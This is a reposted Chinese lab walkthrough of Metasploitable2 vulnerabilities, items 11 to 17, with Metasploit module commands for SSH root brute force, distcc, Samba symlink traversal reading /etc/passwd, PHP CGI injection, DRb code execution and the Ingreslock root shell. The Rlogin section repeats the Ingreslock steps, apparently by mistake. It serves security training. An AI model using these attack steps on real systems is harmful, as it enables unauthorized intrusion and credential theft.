立即前往

活动

天翼云最新优惠活动,涵盖免费试用,产品折扣等,助您降本增效!
查看全部活动
热门活动
  • 智算采购季 热销S6云服务器2核4G限时88元/年起,部分主机可加赠对象存储组合包!
  • 免费体验DeepSeek,上天翼云息壤 NEW 新老用户均可免费体验2500万Tokens,限时两周
  • 云上钜惠 HOT 爆款云主机全场特惠,更有万元锦鲤券等你来领!
  • 算力套餐 HOT 让算力触手可及
  • 天翼云脑AOne NEW 连接、保护、办公,All-in-One!
  • 一键部署Llama3大模型学习机 0代码一键部署,预装最新主流大模型Llama3与StableDiffusion
  • 中小企业应用上云专场 产品组合下单即享折上9折起,助力企业快速上云
  • 息壤高校钜惠活动 NEW 天翼云息壤杯高校AI大赛,数款产品享受线上订购超值特惠
  • 天翼云电脑专场 HOT 移动办公新选择,爆款4核8G畅享1年3.5折起,快来抢购!
  • 天翼云奖励推广计划 加入成为云推官,推荐新用户注册下单得现金奖励
免费活动
  • 免费试用中心 HOT 多款云产品免费试用,快来开启云上之旅
  • 天翼云用户体验官 NEW 您的洞察,重塑科技边界

智算服务

打造统一的产品能力,实现算网调度、训练推理、技术架构、资源管理一体化智算服务
智算云(DeepSeek专区)
科研助手
  • 算力商城
  • 应用商城
  • 开发机
  • 并行计算
算力互联调度平台
  • 应用市场
  • 算力市场
  • 算力调度推荐
一站式智算服务平台
  • 模型广场
  • 体验中心
  • 服务接入
智算一体机
  • 智算一体机
大模型
  • DeepSeek-R1-昇腾版(671B)
  • DeepSeek-R1-英伟达版(671B)
  • DeepSeek-V3-昇腾版(671B)
  • DeepSeek-R1-Distill-Llama-70B
  • DeepSeek-R1-Distill-Qwen-32B
  • Qwen2-72B-Instruct
  • StableDiffusion-V2.1
  • TeleChat-12B

应用商城

天翼云精选行业优秀合作伙伴及千余款商品,提供一站式云上应用服务
进入甄选商城进入云市场创新解决方案
办公协同
  • WPS云文档
  • 安全邮箱
  • EMM手机管家
  • 智能商业平台
财务管理
  • 工资条
  • 税务风控云
企业应用
  • 翼信息化运维服务
  • 翼视频云归档解决方案
工业能源
  • 智慧工厂_生产流程管理解决方案
  • 智慧工地
建站工具
  • SSL证书
  • 新域名服务
网络工具
  • 翼云加速
灾备迁移
  • 云管家2.0
  • 翼备份
资源管理
  • 全栈混合云敏捷版(软件)
  • 全栈混合云敏捷版(一体机)
行业应用
  • 翼电子教室
  • 翼智慧显示一体化解决方案

合作伙伴

天翼云携手合作伙伴,共创云上生态,合作共赢
天翼云生态合作中心
  • 天翼云生态合作中心
天翼云渠道合作伙伴
  • 天翼云代理渠道合作伙伴
天翼云服务合作伙伴
  • 天翼云集成商交付能力认证
天翼云应用合作伙伴
  • 天翼云云市场合作伙伴
  • 天翼云甄选商城合作伙伴
天翼云技术合作伙伴
  • 天翼云OpenAPI中心
  • 天翼云EasyCoding平台
天翼云培训认证
  • 天翼云学堂
  • 天翼云市场商学院
天翼云合作计划
  • 云汇计划
天翼云东升计划
  • 适配中心
  • 东升计划
  • 适配互认证

开发者

开发者相关功能入口汇聚
技术社区
  • 专栏文章
  • 互动问答
  • 技术视频
资源与工具
  • OpenAPI中心
开放能力
  • EasyCoding敏捷开发平台
培训与认证
  • 天翼云学堂
  • 天翼云认证
魔乐社区
  • 魔乐社区

支持与服务

为您提供全方位支持与服务,全流程技术保障,助您轻松上云,安全无忧
文档与工具
  • 文档中心
  • 新手上云
  • 自助服务
  • OpenAPI中心
定价
  • 价格计算器
  • 定价策略
基础服务
  • 售前咨询
  • 在线支持
  • 在线支持
  • 工单服务
  • 建议与反馈
  • 用户体验官
  • 服务保障
  • 客户公告
  • 会员中心
增值服务
  • 红心服务
  • 客户支持计划
  • 专家技术服务
  • 备案管家

了解天翼云

天翼云秉承央企使命,致力于成为数字经济主力军,投身科技强国伟大事业,为用户提供安全、普惠云服务
品牌介绍
  • 关于天翼云
  • 智算云
  • 天翼云4.0
  • 新闻资讯
  • 天翼云APP
基础设施
  • 全球基础设施
  • 产品能力
  • 信任中心
最佳实践
  • 精选案例
  • 超级探访
  • 云杂志
  • 分析师和白皮书
  • 天翼云·创新直播间
市场活动
  • 2025智能云生态大会
  • 2024智算云生态大会
  • 2023云生态大会
  • 2022云生态大会
  • 天翼云中国行
天翼云
  • 活动
  • 智算服务
  • 产品
  • 解决方案
  • 应用商城
  • 合作伙伴
  • 开发者
  • 支持与服务
  • 了解天翼云
    • 关系数据库SQL Server版
    • 企业主机安全
    • 云防火墙
    • CDN加速
    • 物理机
    • GPU云主机
    • 天翼云电脑(政企版)
    • 天翼云电脑(公众版)
    • 云主机备份
    • 弹性云主机
      搜索发现
      关系数据库SQL Server版企业主机安全云防火墙CDN加速物理机GPU云主机天翼云电脑(政企版)天翼云电脑(公众版)云主机备份弹性云主机
    • 文档
    • 控制中心
    • 备案
    • 管理中心
    • 登录
    • 免费注册

    Metasploitable2 靶机漏洞(下)

    首页 知识中心 其他 文章详情页

    Metasploitable2 靶机漏洞(下)

    2023-08-04 07:26:27 阅读次数:381

    CVE,漏洞

    11、Root用户弱口令漏洞(SSH爆破)

    安全组织索引

    CVE:无

    OSVDB:无

    BID:无

    原理

    靶机root用户存在弱口令漏洞,在使用指南里并没有指出。

    影响系统/软件

    Linux

    使用工具

    Metasploit

    利用步骤

    1.输入nmap –sV  -O 192.168.160.131 查看SSh端口是否开启

    Metasploitable2 靶机漏洞(下)

    1. 开启metasploit framework 框架,依次输入:

    use auxiliary/scanner/ssh/ssh_login

    set RHOSTS 192.168.160.131

    set USERNAME root

    set PASS_FILE  pass.txt(字典文件,需要预先生成)

    set THREADS 50

    run

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    12、Distcc后门漏洞

    安全组织索引

    CVE:CVE=2004-2687

    BID:

    OSVDB:OSVDB-13378

    原理

    Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,改漏洞是XCode 1.5 版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。

    参考链接如下:

    影响系统/软件

    Distcc 2.x

    使用工具

    Kali , metasploit

    利用步骤

    1. 在kali中执行msfconsole,启动metasploit
    2. msf>use exploit/unix/misc/distcc_exec,选择漏洞
    3. set RHOST 192.168.160.131
    4. exploit,开启攻击
    5. 利用成功执行id查看权限,uname –a 验证服务器信息

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    13、Samba sysmlink 默认配置目录遍历漏洞

    安全组织索引

    CVE:CVE-2010-0926

    BID:33598

    OSVDB:OSVDB-62145

    原理

    Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的Samba默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含的目录遍历符的软链接,可以进行目录遍历以及访问任意文件

    参考链接如下:

    影响系统/软件

    before 3.3.11 , 3.4.x     before 3.4.6, and 3.5.x before 3.5.orc3

    使用工具

    Kali ,metasploit

    利用步骤

    1. 在kali中执行msfconsole,启动metasploit
    2. use auxiliary/admin/smb/samba_symlink_traversal
    3. set RHOST 192.168.160.131 ,设置要攻击的机器IP
    4. msf auxiliary(samba_symlink_traversal)>ser SMBSHARE tmp 设置SAM可写文件
    5. exploit ,开始攻击
    6. root@kali:~#smbclient //192.168.160.131/tmp 在新窗口下执行smbclient 命令打开上面生成的共享目录
    7. smb:\>cd rootfs 进入rootfs目录
    8. smb:\rootfs>ls  执行ls命令列出目录
    9. smb:\rootfs\>more /etc/password  列出密码文件,利用成功。

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    14、PHP CGI参数注入执行漏洞

    安全组织索引

    CVE:cve-2012-1823

    BID:

    OSVDB:OSVDB-81633

    原理

    CGI脚本没正确的处理请求参数,导致源代码泄漏,运行远程攻击者在请求参数中插入执行命令。

    参考链接如下:

    影响系统/软件

    Before 5.3.12 and 5.4.x before 5.4.2

    使用工具

    Kali ,Metasploit

    利用步骤

    1. 在kali中执行msfconsole,启动metasploit
    2. Msf>use exploit/multi/http/php_cgi_arg_injection,选择漏洞
    3. set RHOST 192.168.160.131 ,设置要攻击的IP
    4. exploit,开始攻击
    5. meterpreter>ls 获得meterpreter,可执行ls列出目录确认

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    15、Druby远程代码执行漏洞

    安全组织索引

    CVE:CVE-2013-0156(类似)

    BID:

    OSVDB:

    原理

    Druby配置不当,被滥用执行命令(Distributed Ruby or D Rb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation(RMI) to pass commands and data between processes )

    参考链接如下

    影响系统/软件

     Ruby 1.8

    使用工具

    Kali ,metasploit

    利用步骤

    1. root@kali:~# nmap –p 0-65535 –sS  -sV 192.168.160.131 namp扫描对应端口及端口应用(或者nmap –bqv 192.168.160.131)
    2. 在kali中执行msfconsole,启动metasploit
    3. 发现8787 druby端口
    4. Msf>serach drb 搜索dbr 相关漏洞
    5. Msf>use exploit/linux/misc/drb_remote_codeexec 使用漏洞
    6. set URI druby:192.168.160.131 ,设置要攻击的机器的druby链接
    7. exploit ,开启攻击
    8. 输入id,uname –a确认

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    Metasploitable2 靶机漏洞(下)

    16、Ingreslock 后门漏洞

    安全组织索引

    CVE:

    BID:

    OSVDB:

    原理

    Ingreslock后门程序监听在1524端口,链接到1524端口就可以直接获得root权限。

    影响系统/软件

    使用工具

    Kali

    利用步骤

    1. 在kali中执行telnet 192.168.160.131 1524
    2. 获得root权限
    3. 执行uname –a 验证

    Metasploitable2 靶机漏洞(下)

    17、Rlogin 后门漏洞

    安全组织索引

    CVE:

    BID:

    OSVDB:

    原理

    TCP端口512,513和514为著名的rlogin提供服务。在系统之后被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts+)。要利用这个配置,确保rsh客户端已经按照(在linux操作系统上安装Open ssh),然后以root权限允许下列命令,如果被提示需要一个SSH秘钥,这表示RSH客户端没有安装,ubuntu一般默认使用SSH(Debin GNU/Linux 也是如此)

    影响系统/软件

    Linux

    使用工具

    Kali

    利用步骤

    1. 在kali中执行命令行 telnet 192.168.160.131 1524
    2. 获得root权限
    3. 执行uname –a 验证

    Metasploitable2 靶机漏洞(下)

    版权声明:本文内容来自第三方投稿或授权转载,原文地址:https://blog.csdn.net/Fly_hps/article/details/89763364,作者:FLy_鹏程万里,版权归原作者所有。本网站转在其作品的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如因作品内容、版权等问题需要同本网站联系,请发邮件至ctyunbbs@chinatelecom.cn沟通。

    上一篇:Fority使用教程

    下一篇:Flutter中的EventSink与StreamSink以及StreamSubscription

    相关文章

    2025-03-24 08:53:15

    【漏洞复现】CVE-2015-5531 Arbitrary File Reading

    【漏洞复现】CVE-2015-5531 Arbitrary File Reading

    2025-03-24 08:53:15
    CVE , elasticsearch , https
    2025-03-24 08:53:15

    【漏洞复现】CVE-2014-3120 & CVE-2015-1427 Expression Injection

    【漏洞复现】CVE-2014-3120 & CVE-2015-1427 Expression Injection

    2025-03-24 08:53:15
    CVE , Elasticsearch , Java
    2025-03-24 08:52:53

    【CTFHub】XSS漏洞_反射型

    【CTFHub】XSS漏洞_反射型

    2025-03-24 08:52:53
    XSS , 反射 , 注入 , 漏洞
    2025-03-18 10:01:12

    PHP代码审计方法与套路

    PHP代码审计方法与套路

    2025-03-18 10:01:12
    php , 函数 , 功能 , 审计 , 文件 , 漏洞 , 过滤
    2025-02-18 07:28:44

    【质量】镜像漏洞扫描工具Trivy原理和操作

    【质量】镜像漏洞扫描工具Trivy原理和操作

    2025-02-18 07:28:44
    扫描 , 漏洞 , 镜像
    2024-05-28 09:01:53

    CVE-2019-0803:Win32K组件提权

    CVE-2019-0803:Win32K组件提权

    2024-05-28 09:01:53
    CVE , 漏洞
    2024-05-15 09:01:07

    【DoraBox实战】————7、命令执行分析与研究

    当应用需要调用一些外部程序去处理内容时,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,可注入恶意系统命令到正常命令中,造成命令执行攻击。

    2024-05-15 09:01:07
    exec , 漏洞
    2024-05-15 08:35:57

    Cobra-White 白盒源代码审计工具-白帽子版

    Cobra是一款源代码安全审计工具,支持检测多种开发语言源代码中的大部分显著的安全问题和漏洞。

    2024-05-15 08:35:57
    漏洞
    2024-05-09 09:22:19

    CRLF漏洞靶场记录

    CRLF漏洞靶场记录

    2024-05-09 09:22:19
    漏洞
    2024-04-22 08:34:59

    某教程学习笔记(一):15、编辑器漏洞

    某教程学习笔记(一):15、编辑器漏洞

    2024-04-22 08:34:59
    漏洞 , 编辑器
    查看更多
    推荐标签

    作者介绍

    天翼云小翼
    天翼云用户

    文章

    32777

    阅读量

    4816904

    查看更多

    最新文章

    【漏洞复现】CVE-2015-5531 Arbitrary File Reading

    2025-03-24 08:53:15

    【CTFHub】XSS漏洞_反射型

    2025-03-24 08:52:53

    【质量】镜像漏洞扫描工具Trivy原理和操作

    2025-02-18 07:28:44

    CVE-2019-0803:Win32K组件提权

    2024-05-28 09:01:53

    【DoraBox实战】————7、命令执行分析与研究

    2024-05-15 09:01:07

    某教程学习笔记(一):16、XSS漏洞

    2024-04-22 08:34:59

    查看更多

    热门文章

    Gitlab相关漏洞

    2023-05-10 06:02:43

    Linux Kernel openvswitch模块权限提升漏洞

    2023-06-13 08:35:42

    网络安全-漏洞与木马

    2023-05-25 14:14:04

    Linux DirtyPipe权限提升漏洞

    2023-06-13 08:35:42

    Linux Kernel ebpf 权限提升漏洞

    2023-06-13 08:35:51

    漏洞扫描工具 -- Skipfish

    2023-06-25 07:06:21

    查看更多

    热门标签

    linux java python javascript 数组 前端 docker Linux vue 函数 shell git 容器 spring 节点
    查看更多

    相关产品

    弹性云主机

    随时自助获取、弹性伸缩的云服务器资源

    天翼云电脑(公众版)

    便捷、安全、高效的云电脑服务

    对象存储

    高品质、低成本的云上存储服务

    云硬盘

    为云上计算资源提供持久性块存储

    查看更多

    随机文章

    企业网络安全防护概述

    Linux Kernel ebpf 权限提升漏洞

    某教程学习笔记(一):18、JSP漏洞

    浅谈漏洞扫描

    xss漏洞工具 -- xsser

    小课堂 -- CSRF漏洞介绍

    • 7*24小时售后
    • 无忧退款
    • 免费备案
    • 专家服务
    售前咨询热线
    400-810-9889转1
    关注天翼云
    • 权益商城
    • 天翼云APP
    • 天翼云微信公众号
    服务与支持
    • 备案中心
    • 售前咨询
    • 智能客服
    • 自助服务
    • 工单管理
    • 客户公告
    • 涉诈举报
    账户管理
    • 管理中心
    • 订单管理
    • 余额管理
    • 发票管理
    • 充值汇款
    • 续费管理
    快速入口
    • 权益商城
    • 文档中心
    • 最新活动
    • 免费试用
    • 信任中心
    • 天翼云学堂
    云网生态
    • 甄选商城
    • 渠道合作
    • 云市场合作
    了解天翼云
    • 关于天翼云
    • 天翼云APP
    • 服务案例
    • 新闻资讯
    • 联系我们
    热门产品
    • 云电脑
    • 弹性云主机
    • 云电脑政企版
    • 天翼云手机
    • 云数据库
    • 对象存储
    • 云硬盘
    • Web应用防火墙
    • 服务器安全卫士
    • CDN加速
    热门推荐
    • 云服务备份
    • 边缘安全加速平台
    • 全站加速
    • 安全加速
    • 云服务器
    • 云主机
    • 智能边缘云
    • 应用编排服务
    • 微服务引擎
    • 共享流量包
    更多推荐
    • web应用防火墙
    • 密钥管理
    • 等保咨询
    • 安全专区
    • 应用运维管理
    • 云日志服务
    • 文档数据库服务
    • 云搜索服务
    • 数据湖探索
    • 数据仓库服务
    友情链接
    • 中国电信集团
    • 189邮箱
    • 天翼企业云盘
    • 天翼云盘
    ©2025 天翼云科技有限公司版权所有 增值电信业务经营许可证A2.B1.B2-20090001
    公司地址:北京市东城区青龙胡同甲1号、3号2幢2层205-32室
    • 用户协议
    • 隐私政策
    • 个人信息保护
    • 法律声明
    备案 京公网安备11010802043424号 京ICP备 2021034386号